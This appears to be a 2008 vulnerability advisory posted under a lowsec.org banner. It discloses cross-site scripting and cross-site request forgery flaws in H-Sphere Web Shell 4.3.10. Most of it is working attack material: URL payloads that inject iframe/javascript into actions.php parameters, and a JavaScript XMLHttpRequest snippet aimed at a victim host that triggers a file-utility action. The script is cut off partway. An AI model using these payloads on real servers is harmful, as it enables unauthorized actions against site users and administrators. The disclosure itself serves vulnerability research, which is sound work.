#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://www.lowsec.org)
#========================================================================#
#========================================================================#
Author: C1c4Tr1Z
Date: 28/09/08
Application: Web Shell version 4.3.10 (2006)
Product WebSite: http://www.psoft.net/HSdocumentation/sysadmin/hsphere-webshell.html
Issues:
[-]Cross-Site Scripting
[-]Cross-Site Request Forgery
Special thanks to OzX (http://www.nullbytes.net/)!
#========================================================================#
#=============================[XSS]======================================#
Proof-of-Concepts:
/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27XSS%27)%3E
/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E]
/actions.php?m=sysinfo&tab=1'>
clear js script:
----------------
with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'